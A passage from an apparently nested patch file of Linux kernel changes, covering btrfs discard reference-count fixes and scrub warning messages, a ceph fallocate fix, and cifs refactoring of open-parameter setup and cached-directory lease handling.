+ 		if (block_group->discard_index == BTRFS_DISCARD_INDEX_UNUSED &&
+ 		    block_group->used != 0) {
+-			if (btrfs_is_block_group_data_only(block_group))
++			if (btrfs_is_block_group_data_only(block_group)) {
+ 				__add_to_discard_list(discard_ctl, block_group);
+-			else
++			} else {
+ 				list_del_init(&block_group->discard_list);
++				btrfs_put_block_group(block_group);
++			}
+ 			goto again;
+ 		}
+ 		if (block_group->discard_state == BTRFS_DISCARD_RESET_CURSOR) {
+@@ -502,6 +523,15 @@ static void btrfs_discard_workfn(struct work_struct *work)
+ 	spin_lock(&discard_ctl->lock);
+ 	discard_ctl->prev_discard = trimmed;
+ 	discard_ctl->prev_discard_time = now;
++	/*
++	 * If the block group was removed from the discard list while it was
++	 * running in this workfn, then we didn't deref it, since this function
++	 * still owned that reference. But we set the discard_ctl->block_group
++	 * back to NULL, so we can use that condition to know that now we need
++	 * to deref the block_group.
++	 */
++	if (discard_ctl->block_group == NULL)
++		btrfs_put_block_group(block_group);
+ 	discard_ctl->block_group = NULL;
+ 	__btrfs_discard_schedule_work(discard_ctl, now, false);
+ 	spin_unlock(&discard_ctl->lock);
+@@ -638,8 +668,12 @@ void btrfs_discard_punt_unused_bgs_list(struct btrfs_fs_info *fs_info)
+ 	list_for_each_entry_safe(block_group, next, &fs_info->unused_bgs,
+ 				 bg_list) {
+ 		list_del_init(&block_group->bg_list);
+-		btrfs_put_block_group(block_group);
+ 		btrfs_discard_queue_work(&fs_info->discard_ctl, block_group);
++		/*
++		 * This put is for the get done by btrfs_mark_bg_unused.
++		 * Queueing discard incremented it for discard's reference.
++		 */
++		btrfs_put_block_group(block_group);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ }
+@@ -669,6 +703,7 @@ static void btrfs_discard_purge_list(struct btrfs_discard_ctl *discard_ctl)
+ 			if (block_group->used == 0)
+ 				btrfs_mark_bg_unused(block_group);
+ 			spin_lock(&discard_ctl->lock);
++			btrfs_put_block_group(block_group);
+ 		}
+ 	}
+ 	spin_unlock(&discard_ctl->lock);
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 196c4c6ed1ed8..c5d8dc112fd58 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -2036,20 +2036,33 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	 * a) don't have an extent buffer and
+ 	 * b) the page is already kmapped
+ 	 */
+-	if (sblock->logical != btrfs_stack_header_bytenr(h))
++	if (sblock->logical != btrfs_stack_header_bytenr(h)) {
+ 		sblock->header_error = 1;
+-
+-	if (sector->generation != btrfs_stack_header_generation(h)) {
+-		sblock->header_error = 1;
+-		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad bytenr, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_bytenr(h),
++			      sblock->logical);
++		goto out;
+ 	}
+ 
+-	if (!scrub_check_fsid(h->fsid, sector))
++	if (!scrub_check_fsid(h->fsid, sector)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad fsid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->fsid, sblock->dev->fs_devices->fsid);
++		goto out;
++	}
+ 
+-	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid,
+-		   BTRFS_UUID_SIZE))
++	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid, BTRFS_UUID_SIZE)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad chunk tree uuid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->chunk_tree_uuid, fs_info->chunk_tree_uuid);
++		goto out;
++	}
+ 
+ 	shash->tfm = fs_info->csum_shash;
+ 	crypto_shash_init(shash);
+@@ -2062,9 +2075,27 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	}
+ 
+ 	crypto_shash_final(shash, calculated_csum);
+-	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size))
++	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size)) {
+ 		sblock->checksum_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad csum, has " CSUM_FMT " want " CSUM_FMT,
++			      sblock->logical, sblock->mirror_num,
++			      CSUM_FMT_VALUE(fs_info->csum_size, on_disk_csum),
++			      CSUM_FMT_VALUE(fs_info->csum_size, calculated_csum));
++		goto out;
++	}
++
++	if (sector->generation != btrfs_stack_header_generation(h)) {
++		sblock->header_error = 1;
++		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad generation, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_generation(h),
++			      sector->generation);
++	}
+ 
++out:
+ 	return sblock->header_error || sblock->checksum_error;
+ }
+ 
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index 5895797f3104a..02414437d8abf 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2095,6 +2095,9 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	loff_t endoff = 0;
+ 	loff_t size;
+ 
++	dout("%s %p %llx.%llx mode %x, offset %llu length %llu\n", __func__,
++	     inode, ceph_vinop(inode), mode, offset, length);
++
+ 	if (mode != (FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE))
+ 		return -EOPNOTSUPP;
+ 
+@@ -2129,6 +2132,10 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	if (ret < 0)
+ 		goto unlock;
+ 
++	ret = file_modified(file);
++	if (ret)
++		goto put_caps;
++
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 	ceph_fscache_invalidate(inode, false);
+ 	ceph_zero_pagecache_range(inode, offset, length);
+@@ -2144,6 +2151,7 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	}
+ 	filemap_invalidate_unlock(inode->i_mapping);
+ 
++put_caps:
+ 	ceph_put_cap_refs(ci, got);
+ unlock:
+ 	inode_unlock(inode);
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 60399081046a5..75d5e06306ea5 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -14,6 +14,7 @@
+ 
+ static struct cached_fid *init_cached_dir(const char *path);
+ static void free_cached_dir(struct cached_fid *cfid);
++static void smb2_close_cached_fid(struct kref *ref);
+ 
+ static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
+ 						    const char *path,
+@@ -181,12 +182,13 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE);
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = pfid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.fid = pfid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -220,8 +222,8 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 		goto oshr_free;
+ 	}
+-
+-	atomic_inc(&tcon->num_remote_opens);
++	cfid->tcon = tcon;
++	cfid->is_open = true;
+ 
+ 	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+ 	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
+@@ -233,12 +235,12 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		goto oshr_free;
+ 
+-
+ 	smb2_parse_contexts(server, o_rsp,
+ 			    &oparms.fid->epoch,
+ 			    oparms.fid->lease_key, &oplock,
+ 			    NULL, NULL);
+-
++	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
++		goto oshr_free;
+ 	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+ 	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
+ 		goto oshr_free;
+@@ -259,9 +261,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	cfid->dentry = dentry;
+-	cfid->tcon = tcon;
+ 	cfid->time = jiffies;
+-	cfid->is_open = true;
+ 	cfid->has_lease = true;
+ 
+ oshr_free:
+@@ -271,7 +271,7 @@ oshr_free:
+ 	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+ 	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+ 	spin_lock(&cfids->cfid_list_lock);
+-	if (!cfid->has_lease) {
++	if (rc && !cfid->has_lease) {
+ 		if (cfid->on_list) {
+ 			list_del(&cfid->entry);
+ 			cfid->on_list = false;
+@@ -280,13 +280,27 @@ oshr_free:
+ 		rc = -ENOENT;
+ 	}
+ 	spin_unlock(&cfids->cfid_list_lock);
++	if (!rc && !cfid->has_lease) {
++		/*
++		 * We are guaranteed to have two references at this point.
++		 * One for the caller and one for a potential lease.
++		 * Release the Lease-ref so that the directory will be closed
++		 * when the caller closes the cached handle.
++		 */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
+ 	if (rc) {
++		if (cfid->is_open)
++			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++				   cfid->fid.volatile_fid);
+ 		free_cached_dir(cfid);
+ 		cfid = NULL;
+ 	}
+ 
+-	if (rc == 0)
++	if (rc == 0) {
+ 		*ret_cfid = cfid;
++		atomic_inc(&tcon->num_remote_opens);
++	}
+ 
+ 	return rc;
+ }
+@@ -335,6 +349,7 @@ smb2_close_cached_fid(struct kref *ref)
+ 	if (cfid->is_open) {
+ 		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
++		atomic_dec(&cfid->tcon->num_remote_opens);
+ 	}
+ 
+ 	free_cached_dir(cfid);
+diff --git a/fs/cifs/cifsacl.c b/fs/cifs/cifsacl.c
+index fa480d62f3137..a6c7566a01821 100644
+--- a/fs/cifs/cifsacl.c
++++ b/fs/cifs/cifsacl.c
+@@ -1423,14 +1423,15 @@ static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 	tcon = tlink_tcon(tlink);
+ 	xid = get_xid();
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = READ_CONTROL,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (!rc) {
+@@ -1489,14 +1490,15 @@ int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 	else
+ 		access_flags = WRITE_DAC;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc) {
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 1724066c15365..6b8f59912f705 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -5314,14 +5314,15 @@ CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	int rc;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = fileName;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = fileName,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 384c7c0e10889..0006b1ca02036 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2843,72 +2843,48 @@ ip_rfc1001_connect(struct TCP_Server_Info *server)
+ 	 * negprot - BB check reconnection in case where second
+ 	 * sessinit is sent but no second negprot
+ 	 */
+-	struct rfc1002_session_packet *ses_init_buf;
+-	unsigned int req_noscope_len;
+-	struct smb_hdr *smb_buf;
++	struct rfc1002_session_packet req = {};
++	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
++	unsigned int len;
+ 
+-	ses_init_buf = kzalloc(sizeof(struct rfc1002_session_packet),
+-			       GFP_KERNEL);
++	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
+ 
+-	if (ses_init_buf) {
+-		ses_init_buf->trailer.session_req.called_len = 32;
++	if (server->server_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      server->server_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      DEFAULT_CIFS_CALLED_NAME,
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		if (server->server_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      server->server_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      DEFAULT_CIFS_CALLED_NAME,
+-				      RFC1001_NAME_LEN_WITH_NULL);
++	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
+ 
+-		ses_init_buf->trailer.session_req.calling_len = 32;
++	/* calling name ends in null (byte 16) from old smb convention */
++	if (server->workstation_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      server->workstation_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      "LINUX_CIFS_CLNT",
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		/*
+-		 * calling name ends in null (byte 16) from old smb
+-		 * convention.
+-		 */
+-		if (server->workstation_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      server->workstation_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      "LINUX_CIFS_CLNT",
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-
+-		ses_init_buf->trailer.session_req.scope1 = 0;
+-		ses_init_buf->trailer.session_req.scope2 = 0;
+-		smb_buf = (struct smb_hdr *)ses_init_buf;
+-
+-		/* sizeof RFC1002_SESSION_REQUEST with no scopes */
+-		req_noscope_len = sizeof(struct rfc1002_session_packet) - 2;
+-
+-		/* == cpu_to_be32(0x81000044) */
+-		smb_buf->smb_buf_length =
+-			cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | req_noscope_len);
+-		rc = smb_send(server, smb_buf, 0x44);
+-		kfree(ses_init_buf);
+-		/*
+-		 * RFC1001 layer in at least one server
+-		 * requires very short break before negprot
+-		 * presumably because not expecting negprot
+-		 * to follow so fast.  This is a simple
+-		 * solution that works without
+-		 * complicating the code and causes no
+-		 * significant slowing down on mount
+-		 * for everyone else
+-		 */
+-		usleep_range(1000, 2000);
+-	}
+ 	/*
+-	 * else the negprot may still work without this
+-	 * even though malloc failed
++	 * As per rfc1002, @len must be the number of bytes that follows the
++	 * length field of a rfc1002 session request payload.
++	 */
++	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
++
++	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
++	rc = smb_send(server, smb_buf, len);
++	/*
++	 * RFC1001 layer in at least one server requires very short break before
++	 * negprot presumably because not expecting negprot to follow so fast.
++	 * This is a simple solution that works without complicating the code
++	 * and causes no significant slowing down on mount for everyone else
+ 	 */
++	usleep_range(1000, 2000);
+ 
+ 	return rc;
+ }
+diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c
+index 8b1c371585564..e382b794acbed 100644
+--- a/fs/cifs/dir.c
++++ b/fs/cifs/dir.c
+@@ -295,15 +295,16 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+ 		create_options |= CREATE_OPTION_READONLY;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
+-	oparms.mode = mode;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++		.mode = mode,
++	};
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc) {
+ 		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 542f22db5f46f..6f5fbbbebec33 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -260,14 +260,15 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	if (f_flags & O_DIRECT)
+ 		create_options |= CREATE_NO_BUFFER;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++	};
+ 
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc)
+@@ -848,14 +849,16 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	if (server->ops->get_lease_key)
+ 		server->ops->get_lease_key(inode, &cfile->fid);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = &cfile->fid;
+-	oparms.reconnect = true;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = &cfile->fid,
++		.reconnect = true,
++	};
+ 
+ 	/*
+ 	 * Can not refresh inode by passing in file_info buf to be returned by
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+index 0c9b619e4386b..8901d884f5b98 100644
+--- a/fs/cifs/inode.c
++++ b/fs/cifs/inode.c
+@@ -508,14 +508,15 @@ cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+ 		return PTR_ERR(tlink);
+ 	tcon = tlink_tcon(tlink);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+@@ -1513,14 +1514,15 @@ cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = DELETE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc != 0)
+@@ -2107,15 +2109,16 @@ cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
+ 	if (to_dentry->d_parent != from_dentry->d_parent)
+ 		goto do_rename_exit;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	/* open the file to be renamed -- we need DELETE perms */
+-	oparms.desired_access = DELETE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = from_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		/* open the file to be renamed -- we need DELETE perms */
++		.desired_access = DELETE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = from_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc == 0) {
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index a5a097a699837..d937eedd74fb6 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -271,14 +271,15 @@ cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	int buf_type = CIFS_NO_BUFFER;
+ 	FILE_ALL_INFO file_info;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
+ 	if (rc)
+@@ -313,14 +314,15 @@ cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_io_parms io_parms = {0};
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -355,13 +357,14 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	struct smb2_file_all_info *pfile_info = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.fid = &fid,
++	};
+ 
+ 	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+ 	if (utf16_path == NULL)
+@@ -421,14 +424,15 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
+-	oparms.mode = 0644;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.fid = &fid,
++		.mode = 0644,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index 4cb364454e130..abda6148be10f 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -576,14 +576,15 @@ static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
+ 			return 0;
+ 
+-		oparms.tcon = tcon;
+-		oparms.cifs_sb = cifs_sb;
+-		oparms.desired_access = FILE_READ_ATTRIBUTES;
+-		oparms.create_options = cifs_create_options(cifs_sb, 0);
+-		oparms.disposition = FILE_OPEN;
+-		oparms.path = full_path;
+-		oparms.fid = &fid;
+-		oparms.reconnect = false;
++		oparms = (struct cifs_open_parms) {
++			.tcon = tcon,
++			.cifs_sb = cifs_sb,
++			.desired_access = FILE_READ_ATTRIBUTES,
++			.create_options = cifs_create_options(cifs_sb, 0),
++			.disposition = FILE_OPEN,
++			.path = full_path,
++			.fid = &fid,
++		};
+ 
+ 		/* Need to check if this is a symbolic link or not */
+ 		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -823,14 +824,15 @@ smb_set_file_info(struct inode *inode, const char *full_path,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -998,15 +1000,16 @@ cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
